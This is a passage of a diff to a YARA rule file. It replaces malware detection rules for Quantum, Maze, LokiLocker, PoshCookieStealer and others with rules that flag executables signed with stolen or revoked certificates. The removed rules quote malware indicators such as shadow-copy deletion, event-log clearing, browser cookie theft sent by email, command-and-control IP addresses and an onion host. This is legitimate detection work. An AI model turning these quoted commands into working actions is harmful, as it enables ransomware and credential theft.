+		thumbprint = "c852fc9670391ff077eb2590639051efa42db5c9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( all of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DrWeb Digital LLC" and pe.signatures [ i ] . serial == "1f:b9:84:d5:a7:29:6b:a7:44:45:c2:3e:ad:7d:20:aa" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Quantum : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_C314A8736F82C411B9F02076A6Db4771 : FILE
 {
 	meta:
-		description = "Detects Quantum locker / ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "76a9240e-5b4f-5a1e-9841-e5ba855fb06f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "0a8af16c-f232-5e09-9825-0e8203ba7b45"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8965-L8987"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3620-L3631"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f35422d1f52f1f9f55a5e38c782d2cf621cd84da028358ab250584334d41249c"
+		logic_hash = "8aa08c4d1da62d0629db6e29f7a730da3534f114620e30f8d89e5475c12f43de"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "\\t<title>Quantum</title>" ascii wide
-		$x2 = "Quantum Locker.<br><br>" ascii wide
-		$s1 = "ERROR" fullword wide
-		$s2 = ".log" fullword wide
-		$s3 = "SLOW" fullword wide
-		$s4 = "Create" fullword wide
-		$s5 = "Integrity" fullword wide
-		$s6 = "Disabled" fullword wide
-		$s7 = "Deny" fullword wide
-		$s8 = "FAST" fullword wide
-		$s9 = "Mandatory" fullword wide
-		$s10 = "plugin.dll" fullword ascii
-		$s11 = "NetGetDCName" fullword ascii
-		$s12 = "NetShareEnum" fullword ascii
-		$s13 = "NetGetJoinInformation" fullword ascii
+		thumbprint = "9c49d7504551ad4ddffad206b095517a386e8a14"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 9 of ( $s* ) or ( pe.number_of_exports == 2 and pe.exports ( "RunW" ) and pe.exports ( "runW" ) and 5 of ( $s* ) ) ) ) or all of ( $x* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cbcbaeaabbfcebfcbbeeffeadfc" and pe.signatures [ i ] . serial == "c3:14:a8:73:6f:82:c4:11:b9:f0:20:76:a6:db:47:71" )
 }
-rule DITEKSHEN_MALWARE_Win_Owowa : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5F7Ef778D51Cd33A5Fc0D2E035Ccd29D : FILE
 {
 	meta:
-		description = "Detects Owowa"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c0a61601-e810-5acc-91a3-fa70db6d94da"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "95b1cba9-9625-55da-a321-08cdd4d3056f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8989-L9007"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3633-L3644"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "afdeb30845ed4ef7b79e733e05d3e1ee53a8c441db74519577893d75c1249a41"
+		logic_hash = "9b57fd9840dceea97a2f013f803e8639add6c6b01f3764b65b3c1fe60ae0dd57"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$u1 = "jFuLIXpzRdateYHoVwMlfc" fullword ascii wide
-		$u2 = "Fb8v91c6tHiKsWzrulCeqO" fullword ascii wide
-		$u3 = "dEUM3jZXaDiob8BrqSy2PQO1" fullword ascii wide
-		$s1 = "powershell.exe" fullword wide
-		$s2 = "<RSAKeyValue><Modulus>" wide
-		$s3 = "HealthMailbox" fullword wide
-		$s4 = "6801b573-4cdb-4307-8d4a-3d1e2842f09f" ascii
-		$s5 = "<PreSend_RequestContent>b__" ascii
-		$s6 = "ClearHeaders" fullword ascii
-		$s7 = "get_UserHostAddress" fullword ascii
-		$s8 = "ExtenderControlDesigner" fullword ascii
+		thumbprint = "87229a298b8de0c7b8d4e23119af1e7850a073f5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $u* ) or ( 2 of ( $u* ) and 3 of ( $s* ) ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ffadbcfabbe" and pe.signatures [ i ] . serial == "5f:7e:f7:78:d5:1c:d3:3a:5f:c0:d2:e0:35:cc:d2:9d" )
 }
-rule DITEKSHEN_MALWARE_Win_Chebka : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ab1D5E43E4Dde77221381E21A764C082 : FILE
 {
 	meta:
-		description = "Detects Chebka"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "df486522-695c-56f5-b93a-6f16829a3a3e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "55135b31-93d7-512f-8506-51e49bc3dc92"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9009-L9030"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3646-L3657"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cc8123a5d20fac51d4dfc225e743539456efb4d649060d078c3ed93e7724da01"
+		logic_hash = "3746c3494dca7fd2e0c7ab6641fe9ebbb8519df755022a3bde99c192158e4299"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "-k netsvcs" wide
-		$s2 = "%ssvchost.exe -k SystemNetworkService" wide
-		$s3 = "Mozilla/4.0 (compatible)" wide
-		$s4 = "_kasssperskdy" wide
-		$s5 = "winssyslog" wide
-		$s6 = "LoaderDll%d" wide
-		$s7 = "cmd.exe /c rundll32.exe shell32.dll," wide
-		$s8 = /cmd.exe \/c start (chrome|msedge|firefox|iexplorer)\.exe/ wide
-		$f1 = ".?AVCHVncManager@@" fullword ascii
-		$f2 = ".?AVCNetstatManager@@" fullword ascii
-		$f3 = ".?AVCTcpAgentListener@@" fullword ascii
-		$f4 = ".?AVIUdpClientListener@@" fullword ascii
-		$f5 = ".?AVCShellManager@@" fullword ascii
-		$f6 = ".?AVCScreenSpy@@" fullword ascii
+		thumbprint = "b84a817517ed50dbae5439be54248d30bd7a3290"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $f* ) or ( 3 of ( $f* ) and 3 of ( $s* ) ) or ( #s8 > 2 and 5 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dadddbffbfcbdaaeeccecbbffac" and pe.signatures [ i ] . serial == "00:ab:1d:5e:43:e4:dd:e7:72:21:38:1e:21:a7:64:c0:82" )
 }
-rule DITEKSHEN_MALWARE_Win_Flagpro : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4743E140C05B33F0449023946Bd05Acb : FILE
 {
 	meta:
-		description = "Detects Flagpro"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "da1bf899-feb5-5ed0-956e-c20bc3565a6e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "f3e8046a-0df7-5a67-a363-02961ec1545b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9032-L9049"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3659-L3670"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c5e5944426b7be690ad62dd0d98a8fc6f8135cab0dbdd8a5aaf1670491eda59d"
+		logic_hash = "be8764a008743f8ca8c1a5760c5daa7f6896c8710f5f79f9d5b42b07ef0d5fa8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "download...." fullword ascii
-		$s2 = "~MYTEMP" fullword wide
-		$s3 = ".?AVCV20_LoaderApp@@" fullword ascii
-		$s4 = ".?AVCV20_LoaderDlg@@" fullword ascii
-		$s5 = "ExecYes" fullword ascii
-		$s6 = /<BODY ID=CV\d+_LoaderDlg BGCOLOR=/ ascii
-		$n1 = "://139.162.87.180" wide
-		$n2 = "://172.104.109.217" wide
-		$n3 = "://org.misecure.com/index.html" wide
-		$b1 = /(get all|click|close|maybe|get_outerHTML|download\d) (finished|pass|ok|windows|failed)!/ fullword ascii
+		thumbprint = "7b32c8cc35b86608c522a38c4fe38ebaa57f27675504cba32e0ab6babbf5094a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( 1 of ( $n* ) and ( 2 of ( $s* ) or 1 of ( $b* ) ) ) or ( 2 of ( $s* ) and 1 of ( $b* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STROI RENOV SARL" and pe.signatures [ i ] . serial == "47:43:e1:40:c0:5b:33:f0:44:90:23:94:6b:d0:5a:cb" )
 }
-rule DITEKSHEN_MALWARE_Win_Nplusminer
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2C1Ee9B583310B5E34A1Ee6945A34B26 : FILE
 {
 	meta:
-		description = "Detects PowerShell based NPlusMiner"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a16b504f-e69a-5abb-8e37-01bf7c2df6ef"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "0cc94ceb-a5bf-511a-bcd0-136b5d35c348"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9051-L9064"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3672-L3683"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f6b81c2276765455d46e20ed81e19caa3ae36a31827568486a09bc1619ec478c"
+		logic_hash = "4891757929b64b45591792dd2526ffb7588345f76bcbd3e47f567e72ba03d7f2"
 		score = 75
 		quality = 75
-		tags = ""
-		snort_sid = "920284"
-
-	strings:
-		$s1 = "$Core | Add-Member @{IsReadOnly = $((Get-ItemProperty -Path \".\\Includes\\Core.ps1\").IsReadOnly)} -Force" fullword ascii
-		$s2 = "$Core | Add-Member @{MinerCustomConfig = $((Get-Content \".\\Config\\MinerCustomConfig.json\" -Raw))} -Force" fullword ascii
-		$s3 = "If ($Variables.CheatGuy -and $Core.corehash -in $Hashes -and $Core.ScriptStartDate -le (Get-Date)" ascii
-		$s4 = "Try{(Get-ItemProperty -Path \".\\Includes\\Core.ps1\").IsReadOnly = $false} catch {}" fullword ascii
-		$s5 = " NPlusMiner/" ascii
+		tags = "FILE"
+		thumbprint = "7af96a09b6c43426369126cfffac018f11e5562cb64d32e5140cff3f138ffea4"
+		importance = 20
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Artmarket" and pe.signatures [ i ] . serial == "2c:1e:e9:b5:83:31:0b:5e:34:a1:ee:69:45:a3:4b:26" )
 }
-rule DITEKSHEN_MALWARE_Win_PWSH_Poshcookiestealer
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D338F8A490E37E6C2Be80A0E349929Fa : FILE
 {
 	meta:
-		description = "Detects PowerShell PoshCookieStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7326a056-288b-534b-811d-172bd6936d7b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "5bb542de-637f-58a4-b96a-f20dba7be1b7"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9066-L9080"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3685-L3696"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "234958098d09732675dd539e8d25c6754ba50bf92b3a19e7fef8c68d70503ec4"
+		logic_hash = "ed7a48df55f2d7873795470b9074421f4008d715db07978c79b174fc3f2a801a"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = "\\User Data\\default\\Network\\Cookies" ascii nocase
-		$s2 = "Send-ToEmail" ascii
-		$s3 = "[Security.Cryptography.ProtectedData]::Unprotect($" ascii
-		$s4 = "$($env:LOCALAPPDATA)\\" ascii
-		$s5 = "$($env:HOMEPATH)\\" ascii
-		$s6 = "|ForEach-Object ToString X2) -join ''" ascii
-		$s7 = ".Attachments.Add($" ascii
+		tags = "FILE"
+		thumbprint = "480a9ce15fc76e03f096fda5af16e44e0d6a212d6f09a898f51ad5206149bbe1"
+		importance = 20
 
 	condition:
-		5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAGUARO ApS" and pe.signatures [ i ] . serial == "00:d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa" )
 }
-rule DITEKSHEN_MALWARE_Win_Garrantdecrypt : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_778906D40695F65Ba518Db760Df44Cd3 : FILE
 {
 	meta:
-		description = "Detects GarrantDecrypt ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e3be3663-9978-5b8e-b6b2-0f44f269adb2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "87f5a591-ed92-5ee8-99f8-04afe302609e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9082-L9096"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3698-L3709"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "84b139e51f0ef0389c641d62409d702b0ae7ec6ecd2fa54baf2cf0c0078a8f5a"
+		logic_hash = "2687ec82b9c968dca91b8f54c600fae794d01be43a31cce4b0e6ef63672870fd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "%appdata%\\_uninstalling_.png" fullword wide
-		$x2 = "C:\\Windows\\sysnative\\vssadmin.exe" fullword wide
-		$x3 = /(ICQ|Skype) (@nuncatarde|@supersuso|@Whitehorsedecryption|@likeahorse|@Konwarszawski|@zipzipulya|Whitehorsedecryption|LIKEAHORSE DECRYPTION|Zip Zipulya)/ ascii
-		$s1 = "your unique ID" ascii
-		$s2 = "Google market ICQ" ascii
-		$s3 = "If you want to restore them, install ICQ" ascii
-		$s4 = "Write to our ICQ @" ascii
+		thumbprint = "1103debcb1e48f7dda9cec4211c0a7a9c1764252"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and 1 of ( $s* ) ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "77:89:06:d4:06:95:f6:5b:a5:18:db:76:0d:f4:4c:d3" )
 }
-rule DITEKSHEN_MALWARE_Win_Locked : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_45Eb9187A2505D8E6C842E6D366Ad0C8 : FILE
 {
 	meta:
-		description = "Detects Locked ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ad2f91ab-9bbb-5d47-a5c3-5a38dbab2ebe"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "75494bb2-fa70-5983-a75c-067b06c597e5"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9098-L9114"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3711-L3722"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b838b996946fb268c66bac68d5e326ff3049340dfb08f2e0a77492df49915d5a"
+		logic_hash = "a900017eb33db455b94e3474ce3a2f1ebf6416ff21477a464aba68d32fd7c938"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "http://xxxx.onion/xxxx-xxxx-xxxx-xxxx" ascii
-		$x2 = "http://pigetrzlperjreyr3fbytm27bljaq4eungv3gdq2tohnoyfrqu4bx5qd.onion" ascii
-		$x3 = "dHA6Ly94eHh4Lm9uaW9uL3h4eHgteHh4eC14eHh4LXh4eHg" ascii
-		$s1 = "choice /t 1 /d y /n >nul" ascii
-		$s2 = ".locked" fullword ascii
-		$s3 = "c:\\system volume information" fullword ascii
-		$s4 = "__$$RECOVERY_README$$__.html" fullword ascii
-		$s5 = "Trunc..." fullword ascii
-		$s6 = /C:\\windows\\temp\\[a-z0-9A-Z]{6}\.tmp/ fullword ascii
+		thumbprint = "63938d34572837514929fa7ae3cfebedf6d2cb65"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( #s6 > 1 and 4 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BAKERA s.r.o." and pe.signatures [ i ] . serial == "45:eb:91:87:a2:50:5d:8e:6c:84:2e:6d:36:6a:d0:c8" )
 }
-rule DITEKSHEN_MALWARE_Win_Maze : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Cbc2Af7D82295A8535F3B26B47522640 : FILE
 {
 	meta:
-		description = "Detects Maze ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f5d1d3e2-1ffe-5ec6-b1ee-bded81867fb8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d4f422a7-2b1c-5db0-ad9b-1eb8b3a75e3c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9116-L9145"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3724-L3735"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d3ce3b43c65dfd9f59ba3c6b64e8d7687db175673cc62068caa1e1da023390c0"
+		logic_hash = "6d9fb9b36bc4370851fd0f54bb9fb05e02fc7a6288355b57073c31b1feade41e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "Uc32nbspacec97c98c99c100c101c102c103c104c105c106c107c108c109c110c" ascii
-		$s1 = "\"%s\" shadowcopy delete" wide
-		$s2 = "[%windir%\\system32\\wbem\\wmic" wide
-		$s3 = "process call create \"cmd /c start %s\"" wide
-		$s4 = "DECRYPT-FILES.html" fullword wide
-		$s5 = "Dear %s, your files" wide
-		$s6 = "%s! Alert! %s! Alert!" wide
-		$s7 = "%BASE64_PLACEHOLDER%" fullword ascii
-		$s8 = "-orDGorX0or" fullword ascii
-		$s9 = { 47 45 54 20 2f 25 73 20 48 54 54 50 2f 31 2e 31
-               0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 25 73
-               0d 0a 48 6f 73 74 3a 20 25 73 0d 0a 43 6f 6e 6e
-               65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69
-               76 65 0d 0a 0d 0a 00 50 4f 53 54 20 2f 25 73 20
-               48 54 54 50 2f 31 2e 31 0d 0a 55 73 65 72 2d 41
-               67 65 6e 74 3a 20 25 73 0d 0a 48 6f 73 74 3a 20
-               25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65
-               3a 20 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65
-               6e 67 74 68 3a 20 25 64 0d 0a 43 6f 6e 6e 65 63
-               74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65
-               0d 0a 0d 0a 00 0d 0a 0d 0a 00 43 6f 6e 74 65 6e
-               74 2d 4c 65 6e 67 74 68 3a 20 00 }
+		thumbprint = "08d2c03d0959905b4b04caee1202b8ed748a8bd0"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eabfdafffefaccaedaec" and pe.signatures [ i ] . serial == "cb:c2:af:7d:82:29:5a:85:35:f3:b2:6b:47:52:26:40" )
 }
-rule DITEKSHEN_MALWARE_Win_Teslarevenge : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ca1D9391Cf5Fe3E696831D98D6C35A6 : FILE
 {
 	meta:
-		description = "Detects TeslaRevenge ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "13e5bb15-47eb-5e49-a1a5-3d51cacede2f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e2f026d6-031d-5058-a7f1-fc492ea47908"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9147-L9167"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3737-L3748"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0f68eae8a076d00c8d058ec148d3557f5770dc827d4690b931faf98797426dbc"
+		logic_hash = "4c60dea4fe28c2799dc88712275e62a795c848120c4b463109942b8d9bc29a81"
 		score = 75
-		quality = 65
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "autospreadifnoav=" ascii wide
-		$s2 = "autospread=" ascii wide
-		$s3 = "noencryptext=" ascii wide
-		$s4 = "teslarvng" wide
-		$s5 = "finished encrypting" wide nocase
-		$s6 = "net scan" wide nocase
-		$s7 = "for /f %%x in ('wevtutil el') do wevtutil cl" ascii
-		$s8 = "tasklist | find /i \"SDELETE.exe\"" ascii
-		$e1 = "mshta.exe" ascii wide nocase
-		$e2 = "sc.exe" ascii wide nocase
-		$e3 = "vssadmin.exe" ascii wide nocase
-		$e4 = "wbadmin.exe" ascii wide nocase
-		$e5 = "cmd.exe" ascii wide nocase
+		thumbprint = "0689776ca5ca0ca9641329dc29efdb61302d7378"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( all of ( $e* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "www.norton.com" and pe.signatures [ i ] . serial == "0c:a1:d9:39:1c:f5:fe:3e:69:68:31:d9:8d:6c:35:a6" )
 }
-rule DITEKSHEN_MALWARE_Win_Lokilocker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_43A36A26Ebc78E111A874D8211A95E3F : FILE
 {
 	meta:
-		description = "Detects LokiLocker ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4f4927c5-79e6-5c5a-b84d-c4728affe9e1"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "651ca649-c707-59d2-b482-5ca6d1e569b0"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9169-L9194"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3750-L3761"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bf78f5e8f40c1a19f6b078a85854e95d5ef1f321393a831edda17b0d65515da7"
+		logic_hash = "2588c91e1cce7e595e4237843b03f3e65427b4c3ea634e9a4f8249e9c9f49dbe"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "SOFTWARE\\Loki" fullword wide
-		$x2 = "Cpriv.Loki" fullword wide
-		$x3 = "Loki/" wide
-		$x4 = /loki(\s)?locker/ fullword wide nocase
-		$s1 = "Restore-My-Files.txt" wide
-		$s2 = "loading encryption keys" wide
-		$s3 = "Kill switch -> enabled" wide
-		$s4 = "ScanSMBShares" fullword ascii
-		$s5 = "RewriteMBR" fullword ascii
-		$s6 = /Encrypt(Drives|File|WinVolume|OsDrive)/ fullword ascii
-		$n1 = "unique-id=" ascii wide
-		$n2 = "&disk-size=" ascii wide
-		$n3 = "&user=Darwin&cpu-name=" ascii wide
-		$n4 = "&ram-size=" ascii wide
-		$n5 = "&os-name=" ascii wide
-		$n6 = "&chat-id=" ascii wide
-		$n7 = "&msg-id=" ascii wide
-		$n8 = "&elapsed-time=" ascii wide
+		thumbprint = "a346bda33b5b3bea04b299fe87c165c4f221645a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 4 of ( $s* ) or 6 of ( $n* ) or ( 3 of ( $s* ) and 3 of ( $n* ) ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 2 of ( $n* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Efacefcafeabbdcbcea" and pe.signatures [ i ] . serial == "43:a3:6a:26:eb:c7:8e:11:1a:87:4d:82:11:a9:5e:3f" )
 }
-rule DITEKSHEN_MALWARE_Osx_Dazzlespy : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5172Caa2119185382343Fcbe09C43Bee : FILE
 {
 	meta:
-		description = "Attemp at hunting for DazzleSpy"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8c5f6605-13d2-578e-9e0b-6a8226991ac5"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "54f38317-2d36-54ec-a3fc-04f8b0fc5529"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9196-L9210"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3763-L3774"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "61305384055f71d92ce2ac3d427a1b6f85ce21f502e759f3af952127b1413470"
-		score = 50
-		quality = 71
+		logic_hash = "7aa1447bd0ac43ac29ed69bd6618c3695bfb50517a7ffce7d4e793ae0c5e0fa6"
+		score = 75
+		quality = 75
 		tags = "FILE"
-
-	strings:
